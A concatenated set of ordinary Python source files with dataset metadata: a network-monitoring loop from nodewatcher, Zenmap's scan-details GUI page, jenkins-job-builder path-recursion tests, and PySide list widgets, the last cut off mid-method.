NodeWarning.create(s.node, WarningCode.AnnounceConflict, EventSource.Monitor)
s.node.conflicting_subnets = True
s.node.save()
for cs in s.get_conflicting_subnets():
NodeWarning.create(cs.node, WarningCode.AnnounceConflict, EventSource.Monitor)
cs.node.conflicting_subnets = True
cs.node.save()
# Remove subnets that were hijacked but are not visible anymore
for s in Subnet.objects.filter(status = SubnetStatus.Hijacked, visible = False):
Event.create_event(s.node, EventCode.SubnetRestored, '', EventSource.Monitor, data = 'Subnet: %s/%s' % (s.subnet, s.cidr))
s.delete()
# Remove (or change their status) subnets that are not visible
Subnet.objects.filter(allocated = False, visible = False).delete()
Subnet.objects.filter(allocated = True, visible = False).update(status = SubnetStatus.NotAnnounced)
for subnet in Subnet.objects.filter(status = SubnetStatus.NotAnnounced, node__visible = True):
NodeWarning.create(subnet.node, WarningCode.OwnNotAnnounced, EventSource.Monitor)
subnet.node.save()
# Remove invisible unknown nodes
for node in Node.objects.filter(status = NodeStatus.Invalid, visible = False).all():
# Create an event since an unknown node has disappeared
Event.create_event(node, EventCode.UnknownNodeDisappeared, '', EventSource.Monitor)
Node.objects.filter(status__in = (NodeStatus.Invalid, NodeStatus.AwaitingRenumber), visible = False).delete()
# Remove invisible links
Link.objects.filter(visible = False).delete()
# Add nodes to topology map and generate output
if not getattr(settings, 'MONITOR_DISABLE_GRAPHS', None):
# Only generate topology when graphing is not disabled
topology = DotTopologyPlotter()
for node in dbNodes.values():
topology.addNode(node)
topology.save(os.path.join(settings.GRAPH_DIR, 'network_topology.png'), os.path.join(settings.GRAPH_DIR, 'network_topology.dot'))
# Ping the nodes to prepare information for later node processing
varsize_results = {}
results, dupes = wifi_utils.ping_hosts(10, nodesToPing)
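  # Note (inferred from process_node's unpacking): each ping_hosts result row is
  # (rtt_min, rtt_avg, rtt_max, pkt_loss); index 3 (packet loss) is collected below
  # for several payload sizes and graphed per node.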
for packet_size in (100, 500, 1000, 1480):
r, d = wifi_utils.ping_hosts(10, nodesToPing, packet_size - 8)
for node_ip in nodesToPing:
varsize_results.setdefault(node_ip, []).append(r[node_ip][3] if node_ip in r else None)
if getattr(settings, 'MONITOR_DISABLE_MULTIPROCESSING', None):
# Multiprocessing is disabled (the MONITOR_DISABLE_MULTIPROCESSING option is usually
    # used for debug purposes where a single process is preferred)
for node_ip in nodesToPing:
process_node(node_ip, results.get(node_ip), node_ip in dupes, nodes[node_ip].links, varsize_results.get(node_ip))
# Commit the transaction here since we do everything in the same session
transaction.commit()
else:
# We MUST commit the current transaction here, because we will be processing
# some transactions in parallel and must ensure that this transaction that has
    # modified the nodes is committed. Otherwise this will deadlock!
transaction.commit()
worker_results = []
for node_ip in nodesToPing:
worker_results.append(
WORKER_POOL.apply_async(process_node, (node_ip, results.get(node_ip), node_ip in dupes, nodes[node_ip].links, varsize_results.get(node_ip)))
)
# Wait for all workers to finish processing
objects = {}
for result in worker_results:
try:
k, v = result.get()
objects[k] = v
except Exception, e:
logging.warning(format_exc())
# When GC debugging is enabled make some additional computations
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
global _MAX_GC_OBJCOUNT
objcount = sum(objects.values())
if '_MAX_GC_OBJCOUNT' not in globals():
_MAX_GC_OBJCOUNT = objcount
logging.debug("GC object count: %d %s" % (objcount, "!M" if objcount > _MAX_GC_OBJCOUNT else ""))
_MAX_GC_OBJCOUNT = max(_MAX_GC_OBJCOUNT, objcount)
# Cleanup all out of date warnings
NodeWarning.clear_obsolete_warnings(EventSource.Monitor)
if __name__ == '__main__':
# Configure logger
logging.basicConfig(level = logging.DEBUG,
format = '%(asctime)s %(levelname)-8s %(message)s',
datefmt = '%a, %d %b %Y %H:%M:%S',
filename = settings.MONITOR_LOGFILE,
filemode = 'a')
# Autodetect fping location
FPING_LOCATIONS = [
getattr(settings, 'FPING_BIN', None),
'/usr/sbin/fping',
'/usr/bin/fping',
'/sw/sbin/fping'
]
for fping_loc in FPING_LOCATIONS:
if not fping_loc:
continue
if os.path.isfile(fping_loc):
wifi_utils.FPING_BIN = fping_loc
logging.info("Found fping in %s." % fping_loc)
break
else:
print "ERROR: Failed to find fping binary! Check that it is installed properly."
exit(1)
# Autodetect graphviz location
GRAPHVIZ_LOCATIONS = [
getattr(settings, 'GRAPHVIZ_BIN', None),
'/usr/bin/neato',
'/sw/bin/neato'
]
for graphviz_loc in GRAPHVIZ_LOCATIONS:
if not graphviz_loc:
continue
if os.path.isfile(graphviz_loc):
DotTopologyPlotter.GRAPHVIZ_BIN = graphviz_loc
logging.info("Found graphviz in %s." % graphviz_loc)
break
else:
print "ERROR: Failed to find graphviz binary! Check that it is installed properly."
exit(1)
# Check if we should just update RRDs
if options.update_rrds:
print ">>> Updating RRDs..."
update_rrds()
print ">>> RRD updates completed."
exit(0)
# Check if we should just perform reverse population of RRDs
if options.reverse_populate:
try:
node = Node.objects.get(pk = options.rp_node)
except Node.DoesNotExist:
print "ERROR: Invalid node specified."
exit(1)
try:
conf = graphs.RRA_CONF_MAP[int(options.rp_graph)]
except (ValueError, KeyError):
print "ERROR: Invalid graph type specified."
exit(1)
print ">>> Reverse populating RRDs for node '%s', graph '%s'..." % (node.name, conf.__name__)
try:
graph = GraphItem.objects.filter(node = node, type = int(options.rp_graph))[0]
except IndexError:
print "ERROR: No graph items of specified type are available for this node."
exit(1)
archive = str(os.path.join(settings.MONITOR_WORKDIR, 'rra', graph.rra))
RRA.reverse_populate(node, conf, archive)
exit(0)
# Check if we should just perform stress testing
if options.stress_test:
print ">>> Performing stress test..."
# Force some settings
settings.MONITOR_ENABLE_SIMULATION = True
settings.MONITOR_DISABLE_MULTIPROCESSING = True
# Check network status in a tight loop
try:
for i in xrange(1000):
check_network_status()
check_dead_graphs()
check_events()
# Output progress messages
if i > 0 and i % 10 == 0:
print " > Completed %d iterations. (%d gc objects)" % (i, len(gc.get_objects()))
except KeyboardInterrupt:
print "!!! Aborted by user."
exit(1)
except:
print "!!! Unhandled exception."
print_exc()
exit(1)
print ">>> Stress test completed."
exit(0)
# Output warnings when debug mode is enabled
if getattr(settings, 'DEBUG', None):
logging.warning("Debug mode is enabled, monitor will leak memory!")
if getattr(settings, 'MONITOR_ENABLE_SIMULATION', None):
logging.warning("All feeds are being simulated!")
if getattr(settings, 'MONITOR_DISABLE_MULTIPROCESSING', None):
logging.warning("Multiprocessing mode disabled.")
if getattr(settings, 'MONITOR_DISABLE_GRAPHS', None):
logging.warning("Graph generation disabled.")
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
logging.warning("Garbage collection debugging enabled.")
# Create worker pool and start processing
logging.info("nodewatcher network monitoring system is initializing...")
WORKER_POOL = multiprocessing.Pool(processes = settings.MONITOR_WORKERS)
try:
while True:
# Perform all processing
ts_start = time.time()
try:
check_network_status()
check_dead_graphs()
check_global_statistics()
check_events()
except KeyboardInterrupt:
raise
except:
logging.warning(format_exc())
# Go to sleep for a while
ts_delta = time.time() - ts_start
if ts_delta > settings.MONITOR_POLL_INTERVAL // 2:
logging.warning("Processing took more than half of monitor poll interval ({0} sec)!".format(round(ts_delta, 2)))
ts_delta = settings.MONITOR_POLL_INTERVAL // 2
sleep(settings.MONITOR_POLL_INTERVAL - ts_delta)
except:
logging.warning("Terminating workers...")
WORKER_POOL.terminate()
|
agpl-3.0
| 7,879,637,176,988,811,000
| 36.925249
| 224
| 0.635846
| false
| 3.692843
| false
| false
| false
|
grongor/school_rfid
|
lib/nmap-6.40/zenmap/zenmapGUI/ScanRunDetailsPage.py
|
1
|
16962
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ***********************IMPORTANT NMAP LICENSE TERMS************************
# * *
# * The Nmap Security Scanner is (C) 1996-2013 Insecure.Com LLC. Nmap is *
# * also a registered trademark of Insecure.Com LLC. This program is free *
# * software; you may redistribute and/or modify it under the terms of the *
# * GNU General Public License as published by the Free Software *
# * Foundation; Version 2 ("GPL"), BUT ONLY WITH ALL OF THE CLARIFICATIONS *
# * AND EXCEPTIONS DESCRIBED HEREIN. This guarantees your right to use, *
# * modify, and redistribute this software under certain conditions. If *
# * you wish to embed Nmap technology into proprietary software, we sell *
# * alternative licenses (contact sales@insecure.com). Dozens of software *
# * vendors already license Nmap technology such as host discovery, port *
# * scanning, OS detection, version detection, and the Nmap Scripting *
# * Engine. *
# * *
# * Note that the GPL places important restrictions on "derivative works", *
# * yet it does not provide a detailed definition of that term. To avoid *
# * misunderstandings, we interpret that term as broadly as copyright law *
# * allows. For example, we consider an application to constitute a *
# * derivative work for the purpose of this license if it does any of the *
# * following with any software or content covered by this license *
# * ("Covered Software"): *
# * *
# * o Integrates source code from Covered Software. *
# * *
# * o Reads or includes copyrighted data files, such as Nmap's nmap-os-db *
# * or nmap-service-probes. *
# * *
# * o Is designed specifically to execute Covered Software and parse the *
# * results (as opposed to typical shell or execution-menu apps, which will *
# * execute anything you tell them to). *
# * *
# * o Includes Covered Software in a proprietary executable installer. The *
# * installers produced by InstallShield are an example of this. Including *
# * Nmap with other software in compressed or archival form does not *
# * trigger this provision, provided appropriate open source decompression *
# * or de-archiving software is widely available for no charge. For the *
# * purposes of this license, an installer is considered to include Covered *
# * Software even if it actually retrieves a copy of Covered Software from *
# * another source during runtime (such as by downloading it from the *
# * Internet). *
# * *
# * o Links (statically or dynamically) to a library which does any of the *
# * above. *
# * *
# * o Executes a helper program, module, or script to do any of the above. *
# * *
# * This list is not exclusive, but is meant to clarify our interpretation *
# * of derived works with some common examples. Other people may interpret *
# * the plain GPL differently, so we consider this a special exception to *
# * the GPL that we apply to Covered Software. Works which meet any of *
# * these conditions must conform to all of the terms of this license, *
# * particularly including the GPL Section 3 requirements of providing *
# * source code and allowing free redistribution of the work as a whole. *
# * *
# * As another special exception to the GPL terms, Insecure.Com LLC grants *
# * permission to link the code of this program with any version of the *
# * OpenSSL library which is distributed under a license identical to that *
# * listed in the included docs/licenses/OpenSSL.txt file, and distribute *
# * linked combinations including the two. *
# * *
# * Any redistribution of Covered Software, including any derived works, *
# * must obey and carry forward all of the terms of this license, including *
# * obeying all GPL rules and restrictions. For example, source code of *
# * the whole work must be provided and free redistribution must be *
# * allowed. All GPL references to "this License", are to be treated as *
# * including the special and conditions of the license text as well. *
# * *
# * Because this license imposes special exceptions to the GPL, Covered *
# * Work may not be combined (even as part of a larger work) with plain GPL *
# * software. The terms, conditions, and exceptions of this license must *
# * be included as well. This license is incompatible with some other open *
# * source licenses as well. In some cases we can relicense portions of *
# * Nmap or grant special permissions to use it in other open source *
# * software. Please contact fyodor@nmap.org with any such requests. *
# * Similarly, we don't incorporate incompatible open source software into *
# * Covered Software without special permission from the copyright holders. *
# * *
# * If you have any questions about the licensing restrictions on using *
# * Nmap in other works, are happy to help. As mentioned above, we also *
# * offer alternative license to integrate Nmap into proprietary *
# * applications and appliances. These contracts have been sold to dozens *
# * of software vendors, and generally include a perpetual license as well *
# * as providing for priority support and updates. They also fund the *
# * continued development of Nmap. Please email sales@insecure.com for *
# * further information. *
# * *
# * If you received these files with a written license agreement or *
# * contract stating terms other than the terms above, then that *
# * alternative license agreement takes precedence over these comments. *
# * *
# * Source is provided to this software because we believe users have a *
# * right to know exactly what a program is going to do before they run it. *
# * This also allows you to audit the software for security holes (none *
# * have been found so far). *
# * *
# * Source code also allows you to port Nmap to new platforms, fix bugs, *
# * and add new features. You are highly encouraged to send your changes *
# * to the dev@nmap.org mailing list for possible incorporation into the *
# * main distribution. By sending these changes to Fyodor or one of the *
# * Insecure.Org development mailing lists, or checking them into the Nmap *
# * source code repository, it is understood (unless you specify otherwise) *
# * that you are offering the Nmap Project (Insecure.Com LLC) the *
# * unlimited, non-exclusive right to reuse, modify, and relicense the *
# * code. Nmap will always be available Open Source, but this is important *
# * because the inability to relicense code has caused devastating problems *
# * for other Free Software projects (such as KDE and NASM). We also *
# * occasionally relicense the code to third parties as discussed above. *
# * If you wish to specify special license conditions of your *
# * contributions, just say so when you send them. *
# * *
# * This program is distributed in the hope that it will be useful, but *
# * WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the Nmap *
# * license file for more details (it's in a COPYING file included with *
# * Nmap, and also available from https://svn.nmap.org/nmap/COPYING *
# * *
# ***************************************************************************/
import gtk
from zenmapGUI.higwidgets.higboxes import HIGVBox, HIGHBox, hig_box_space_holder
from zenmapGUI.higwidgets.higtables import HIGTable
from zenmapGUI.higwidgets.higlabels import HIGEntryLabel
import zenmapCore.I18N
class ScanRunDetailsPage(HIGVBox):
def __init__(self, scan):
HIGVBox.__init__(self)
na = _('Not available')
# Command info
self.command_label = HIGEntryLabel(_('Command:'))
self.info_command_label = HIGEntryLabel(na)
self.nmap_version_label = HIGEntryLabel(_('Nmap Version:'))
self.info_nmap_version_label = HIGEntryLabel(na)
self.verbose_label = HIGEntryLabel(_('Verbosity level:'))
self.info_verbose_label = HIGEntryLabel(na)
self.debug_label = HIGEntryLabel(_('Debug level:'))
self.info_debug_label = HIGEntryLabel(na)
self.command_expander = gtk.Expander("<b>"+_("Command Info")+"</b>")
self.command_expander.set_use_markup(True)
self.command_table = HIGTable()
self.command_table.set_border_width(5)
self.command_table.set_row_spacings(6)
self.command_table.set_col_spacings(6)
self.command_hbox = HIGHBox()
self.command_hbox._pack_noexpand_nofill(hig_box_space_holder())
self.command_hbox._pack_noexpand_nofill(self.command_table)
self.command_table.attach(self.command_label,0,1,0,1)
self.command_table.attach(self.info_command_label,1,2,0,1)
self.command_table.attach(self.nmap_version_label,0,1,1,2)
self.command_table.attach(self.info_nmap_version_label,1,2,1,2)
self.command_table.attach(self.verbose_label,0,1,2,3)
self.command_table.attach(self.info_verbose_label,1,2,2,3)
self.command_table.attach(self.debug_label,0,1,3,4)
self.command_table.attach(self.info_debug_label,1,2,3,4)
self.command_expander.add(self.command_hbox)
self._pack_noexpand_nofill(self.command_expander)
self.command_expander.set_expanded(True)
# General info:
self.start_label = HIGEntryLabel(_('Started on:'))
self.info_start_label = HIGEntryLabel(na)
self.finished_label = HIGEntryLabel(_('Finished on:'))
self.info_finished_label = HIGEntryLabel(na)
self.host_up_label = HIGEntryLabel(_('Hosts up:'))
self.info_hosts_up_label = HIGEntryLabel(na)
self.host_down_label = HIGEntryLabel(_('Hosts down:'))
self.info_hosts_down_label = HIGEntryLabel(na)
self.host_scanned_label = HIGEntryLabel(_('Hosts scanned:'))
self.info_hosts_scanned_label = HIGEntryLabel(na)
self.open_label = HIGEntryLabel(_('Open ports:'))
self.info_open_label = HIGEntryLabel(na)
self.filtered_label = HIGEntryLabel(_('Filtered ports:'))
self.info_filtered_label = HIGEntryLabel(na)
self.closed_label = HIGEntryLabel(_('Closed ports:'))
self.info_closed_label = HIGEntryLabel(na)
self.general_expander = gtk.Expander("<b>"+_("General Info")+"</b>")
self.general_expander.set_use_markup(True)
self.general_table = HIGTable()
self.general_table.set_border_width(5)
self.general_table.set_row_spacings(6)
self.general_table.set_col_spacings(6)
self.general_hbox = HIGHBox()
self.general_hbox._pack_noexpand_nofill(hig_box_space_holder())
self.general_hbox._pack_noexpand_nofill(self.general_table)
self.general_table.attach(self.start_label,0,1,0,1)
self.general_table.attach(self.info_start_label,1,2,0,1)
self.general_table.attach(self.finished_label,0,1,1,2)
self.general_table.attach(self.info_finished_label,1,2,1,2)
self.general_table.attach(self.host_up_label,0,1,2,3)
self.general_table.attach(self.info_hosts_up_label,1,2,2,3)
self.general_table.attach(self.host_down_label,0,1,3,4)
self.general_table.attach(self.info_hosts_down_label,1,2,3,4)
self.general_table.attach(self.host_scanned_label,0,1,4,5)
self.general_table.attach(self.info_hosts_scanned_label,1,2,4,5)
self.general_table.attach(self.open_label,0,1,5,6)
self.general_table.attach(self.info_open_label,1,2,5,6)
self.general_table.attach(self.filtered_label,0,1,6,7)
self.general_table.attach(self.info_filtered_label,1,2,6,7)
self.general_table.attach(self.closed_label,0,1,7,8)
self.general_table.attach(self.info_closed_label,1,2,7,8)
self.general_expander.add(self.general_hbox)
self._pack_noexpand_nofill(self.general_expander)
self.general_expander.set_expanded(True)
self._set_from_scan(scan)
def _set_from_scan(self, scan):
"""Initialize the display from a parsed scan."""
# Command info.
self.info_command_label.set_text(scan.get_nmap_command())
self.info_nmap_version_label.set_text(scan.get_scanner_version())
self.info_verbose_label.set_text(scan.get_verbose_level())
self.info_debug_label.set_text(scan.get_debugging_level())
# General info.
self.info_start_label.set_text(scan.get_formatted_date())
self.info_finished_label.set_text(scan.get_formatted_finish_date())
self.info_hosts_up_label.set_text(str(scan.get_hosts_up()))
self.info_hosts_down_label.set_text(str(scan.get_hosts_down()))
self.info_hosts_scanned_label.set_text(str(scan.get_hosts_scanned()))
self.info_open_label.set_text(str(scan.get_open_ports()))
self.info_filtered_label.set_text(str(scan.get_filtered_ports()))
self.info_closed_label.set_text(str(scan.get_closed_ports()))
for scaninfo in scan.get_scaninfo():
exp = gtk.Expander('<b>%s - %s</b>' % (_('Scan Info'), scaninfo['type'].capitalize()))
exp.set_use_markup(True)
display = self.make_scaninfo_display(scaninfo)
exp.add(display)
self._pack_noexpand_nofill(exp)
def make_scaninfo_display(self, scaninfo):
"""Return a widget displaying a scan's "scaninfo" information: type,
protocol, number of scanned ports, and list of services."""
hbox = HIGHBox()
table = HIGTable()
table.set_border_width(5)
table.set_row_spacings(6)
table.set_col_spacings(6)
table.attach(HIGEntryLabel(_('Scan type:')),0,1,0,1)
table.attach(HIGEntryLabel(scaninfo['type']),1,2,0,1)
table.attach(HIGEntryLabel(_('Protocol:')),0,1,1,2)
table.attach(HIGEntryLabel(scaninfo['protocol']),1,2,1,2)
table.attach(HIGEntryLabel(_('# scanned ports:')),0,1,2,3)
table.attach(HIGEntryLabel(scaninfo['numservices']),1,2,2,3)
table.attach(HIGEntryLabel(_('Services:')),0,1,3,4)
table.attach(self.make_services_display(scaninfo['services']),1,2,3,4)
hbox._pack_noexpand_nofill(hig_box_space_holder())
hbox._pack_noexpand_nofill(table)
return hbox
def make_services_display(self, services):
"""Return a widget displaying a list of services like
1-1027,1029-1033,1040,1043,1050,1058-1059,1067-1068,1076,1080"""
combo = gtk.combo_box_new_text()
for i in services.split(","):
combo.append_text(i)
return combo
if __name__ == "__main__":
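    # Quick-run sketch: pass the path to an Nmap XML results file as the first
    # argument, e.g. python ScanRunDetailsPage.py scan.xml ("scan.xml" is a placeholder name).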
import sys
from zenmapCore.NmapParser import NmapParser
filename = sys.argv[1]
parsed = NmapParser()
parsed.parse_file(filename)
run_details = ScanRunDetailsPage(parsed)
window = gtk.Window()
window.add(run_details)
window.connect("delete-event", lambda *args: gtk.main_quit())
window.show_all()
gtk.main()
|
gpl-2.0
| 135,565,421,673,264,290
| 52.172414
| 98
| 0.598161
| false
| 3.841033
| false
| false
| false
|
joostvdg/jenkins-job-builder
|
tests/cmd/test_recurse_path.py
|
1
|
4946
|
import os
from tests.base import mock
import testtools
from jenkins_jobs import utils
def fake_os_walk(paths):
"""Helper function for mocking os.walk() where must test that manipulation
of the returned dirs variable works as expected
"""
paths_dict = dict(paths)
def os_walk(top, topdown=True):
dirs, nondirs = paths_dict[top]
yield top, dirs, nondirs
for name in dirs:
# hard code use of '/' to ensure the test data can be defined as
# simple strings otherwise tests using this helper will break on
# platforms where os.path.sep is different.
new_path = "/".join([top, name])
for x in os_walk(new_path, topdown):
yield x
return os_walk
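# Shape of the `paths` argument expected above (the directory names here are made up):
# a sequence of (top, (dirs, nondirs)) pairs, e.g.
#   walk = fake_os_walk([('/root', (['a'], ('f',))), ('/root/a', ([], ()))])
#   list(walk('/root'))  # -> [('/root', ['a'], ('f',)), ('/root/a', [], ())]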
# Testing the utils module can sometimes result in the CacheStorage class
# attempting to create the cache directory multiple times as the tests
# are run in parallel. Stub out the CacheStorage to ensure that each
# test can safely create the object without effect.
@mock.patch('jenkins_jobs.builder.CacheStorage', mock.MagicMock)
class CmdRecursePath(testtools.TestCase):
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_pattern(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using pattern
excludes.
testing paths
/jjb_configs/dir1/test1/
/jjb_configs/dir1/file
/jjb_configs/dir2/test2/
/jjb_configs/dir3/bar/
/jjb_configs/test3/bar/
/jjb_configs/test3/baz/
"""
os_walk_paths = [
('/jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('/jjb_configs/dir1', (['test1'], ('file'))),
('/jjb_configs/dir2', (['test2'], ())),
('/jjb_configs/dir3', (['bar'], ())),
('/jjb_configs/dir3/bar', ([], ())),
('/jjb_configs/test3/bar', None),
('/jjb_configs/test3/baz', None)
]
paths = [k for k, v in os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(os_walk_paths)
self.assertEqual(paths, utils.recurse_path('/jjb_configs', ['test*']))
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_absolute(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using absolute
excludes.
testing paths
/jjb_configs/dir1/test1/
/jjb_configs/dir1/file
/jjb_configs/dir2/test2/
/jjb_configs/dir3/bar/
/jjb_configs/test3/bar/
/jjb_configs/test3/baz/
"""
os_walk_paths = [
('/jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('/jjb_configs/dir1', None),
('/jjb_configs/dir2', (['test2'], ())),
('/jjb_configs/dir3', (['bar'], ())),
('/jjb_configs/test3', (['bar', 'baz'], ())),
('/jjb_configs/dir2/test2', ([], ())),
('/jjb_configs/dir3/bar', ([], ())),
('/jjb_configs/test3/bar', ([], ())),
('/jjb_configs/test3/baz', ([], ()))
]
paths = [k for k, v in os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(os_walk_paths)
self.assertEqual(paths, utils.recurse_path('/jjb_configs',
['/jjb_configs/dir1']))
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_relative(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using relative
excludes.
testing paths
./jjb_configs/dir1/test/
./jjb_configs/dir1/file
./jjb_configs/dir2/test/
./jjb_configs/dir3/bar/
./jjb_configs/test3/bar/
./jjb_configs/test3/baz/
"""
os_walk_paths = [
('jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('jjb_configs/dir1', (['test'], ('file'))),
('jjb_configs/dir2', (['test2'], ())),
('jjb_configs/dir3', (['bar'], ())),
('jjb_configs/test3', (['bar', 'baz'], ())),
('jjb_configs/dir1/test', ([], ())),
('jjb_configs/dir2/test2', ([], ())),
('jjb_configs/dir3/bar', ([], ())),
('jjb_configs/test3/bar', None),
('jjb_configs/test3/baz', ([], ()))
]
rel_os_walk_paths = [
(os.path.abspath(
os.path.join(os.path.curdir, k)), v) for k, v in os_walk_paths]
paths = [k for k, v in rel_os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(rel_os_walk_paths)
self.assertEqual(paths, utils.recurse_path('jjb_configs',
['jjb_configs/test3/bar']))
|
apache-2.0
| -2,137,185,602,599,578,600
| 35.367647
| 79
| 0.531945
| false
| 3.586657
| true
| false
| false
|
davidsoncolin/IMS
|
UI/QCore.py
|
1
|
53288
|
#!/usr/bin/env python
import functools
import numpy as np
from PySide import QtCore, QtGui
from GCore import State
from UI import createAction
import weakref
class QListWidget(QtGui.QListView):
item_selected = QtCore.Signal(int)
focus_changed = QtCore.Signal(bool)
item_renamed = QtCore.Signal(str, str)
data_changed = QtCore.Signal(dict)
def __init__(self, items=[], parent=None, renameEnabled=False):
super(QListWidget, self).__init__(parent)
self.item_count = 0
self.renameEnabled = renameEnabled
self.overrideSelection = None
self.selectedItem = None
self.item_list_model = None
self.item_selection_model = None
self.setDragEnabled(True)
self.setDragDropOverwriteMode(False)
self.setDragDropMode(QtGui.QAbstractItemView.InternalMove)
self.createWidgets()
for item in items:
self.addItem(item)
def count(self):
return self.item_count
def createWidgets(self):
self.item_list_model = QtGui.QStandardItemModel(self)
self.item_list_model.setSortRole(QtCore.Qt.DisplayRole)
self.item_list_model.dataChanged.connect(self.handleDataChange)
self.setModel(self.item_list_model)
self.item_selection_model = self.selectionModel()
self.item_selection_model.selectionChanged.connect(self.handleItemSelect)
self.setMinimumHeight(60)
self.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred))
def handleDataChange(self, *args):
print ("Data Change: {}".format(args))
self.overrideSelection = args[0].row()
newText = self.getItem(args[0].row(), QtCore.Qt.DisplayRole)
if newText != self.selectedItem:
self.item_renamed.emit(self.selectedItem, newText)
self.selectedItem = newText
else:
self.data_changed.emit({})
def focusInEvent(self, *args):
self.focus_changed.emit(True)
def focusOutEvent(self, *args):
self.focus_changed.emit(False)
def handleItemSelect(self, *args):
if self.overrideSelection is not None:
self.setUserSelection(self.overrideSelection)
self.overrideSelection = None
return
try:
self.selectedItem = self.getItem(self.getSelection(), QtCore.Qt.DisplayRole)
print ("Selected: {}".format(self.selectedItem))
self.item_selected.emit(self.getSelection())
except AttributeError:
pass
def getSelection(self):
try:
selection = self.item_selection_model.selection().indexes()[0].row()
except IndexError:
selection = -1
return selection
def removeItem(self, index):
self.item_list_model.takeRow(index)
self.item_count -= 1
def clear(self):
while self.item_count:
self.removeItem(0)
def addItem(self, mitem, data='', index=None):
item = QtGui.QStandardItem()
item.setData(mitem, QtCore.Qt.DisplayRole)
item.setData(data, QtCore.Qt.UserRole)
item.setEditable(self.renameEnabled)
item.setDropEnabled(False)
# Can be used to store data linked to the name
# item.setData(customData, QtCore.Qt.UserRole)
if index is None:
self.item_list_model.appendRow(item)
else:
self.item_list_model.insertRow(index, item)
self.item_count += 1
def addItems(self, items):
for item in items:
self.addItem(item)
def setUserSelection(self, index):
if self.item_count > 0:
self.setCurrentIndex(self.item_list_model.item(index).index())
self.selectedItem = self.getItem(index, QtCore.Qt.DisplayRole)
def getItems(self, role=None):
if role is None:
return [self.item_list_model.item(i) for i in xrange(0, self.item_count)]
else:
return [self.item_list_model.item(i).data(role) for i in xrange(0, self.item_count)]
def getItem(self, index, role=None):
if role is None:
return self.item_list_model.item(index)
else:
return self.item_list_model.item(index).data(role)
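# A minimal usage sketch for QListWidget, assuming a QApplication already exists when it
# is called; the item names, the UserRole payload and the no-op slots are placeholders.
def _example_qlistwidget_usage():
    lst = QListWidget(items=['take_01', 'take_02'], renameEnabled=True)
    lst.item_selected.connect(lambda index: None)           # row index of the new selection
    lst.item_renamed.connect(lambda old, new: None)         # emitted on an in-place rename
    lst.addItem('take_03', data={'path': '/tmp/take_03'})   # data lands in the UserRole slot
    lst.setUserSelection(0)
    return lst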
class QNodeWidget(QListWidget):
def __init__(self, parent):
super(QNodeWidget, self).__init__(parent=parent)
self.cookFrom = -1
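        # cookFrom is the row index up to which getNodes() evaluates the node list;
        # -1 means no cook point is set, so every node is returned.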
self.connect(self, QtCore.SIGNAL("doubleClicked(QModelIndex)"), self, QtCore.SLOT("ItemDoubleClicked(QModelIndex)"))
def addItem(self, mitem, data='', index=None):
super(QNodeWidget, self).addItem(mitem, data, index)
def getNodes(self):
items = self.getItems(QtCore.Qt.DisplayRole)
if self.cookFrom == -1: return items
evaluate = items[:self.cookFrom + 1]
return evaluate
def ItemDoubleClicked(self, index):
self.changeCookIndex(self.getSelection(), False)
def changeCookIndex(self, index, allowDeselect=False, flush=True):
selectedItem = self.getItem(index)
if index == self.cookFrom and allowDeselect:
self.cookFrom = -1
selectedItem.setBackground(QtGui.QColor(255, 255, 255))
else:
prevCookIndex = self.cookFrom
self.cookFrom = index
if prevCookIndex != -1:
self.getItem(prevCookIndex).setBackground(QtGui.QColor(255, 255, 255))
selectedItem.setBackground(QtGui.QColor(50, 0, 180, 150))
self.data_changed.emit({'flush': flush})
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_P:
self.changeCookIndex(self.getSelection())
class QOrderedListWidget(QtGui.QGroupBox):
''' A list widget where the order of items is important and can be
changed by the user '''
item_edit = QtCore.Signal(int, list)
def __init__(self, items=[], parent=None):
super(QOrderedListWidget, self).__init__(parent)
self.item_count = 0
self.createWidgets()
self.createMenus()
self.setTitle("Items")
for item in items:
self.addItem(item)
def createWidgets(self):
self._itemList = QtGui.QListView(self)
self.item_list_model = QtGui.QStandardItemModel(self)
self.item_list_model.setSortRole(QtCore.Qt.UserRole + 1)
self._itemList.setModel(self.item_list_model)
self.item_list_model.dataChanged.connect(self.handleDataChange)
plsm = self._itemList.selectionModel()
plsm.selectionChanged.connect(self._handleItemSelect)
self._itemList.setMinimumHeight(60)
self.toolBar = QtGui.QToolBar(self)
self.toolBar.setOrientation(QtCore.Qt.Vertical)
self._itemList.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)) # .MinimumExpanding))
layout = QtGui.QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
layout.addWidget(self._itemList)
layout.addWidget(self.toolBar)
self.setLayout(layout)
def move(self, di=1):
""" move the selected item up (di=-1) or down (di=1). Updates the model(ui) and the
ik item order """
sm = self._itemList.selectionModel()
try:
selectedIndex = sm.selection().indexes()[0]
except IndexError: # nothing selected at all
return
order = selectedIndex.data(QtCore.Qt.UserRole + 1)
# if it will be moved out of list bounds then skip
if (order + di) < 0 or (order + di) >= self.item_count: return
# swap the two items in the list model.
self.item_list_model.item(order).setData(order + di, QtCore.Qt.UserRole + 1)
self.item_list_model.item(order + di).setData(order, QtCore.Qt.UserRole + 1)
# re-sort and notify
self.item_list_model.sort(0)
try:
selection = sm.selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def handleDataChange(self):
pass
def _handleItemSelect(self, selected, deselected):
try:
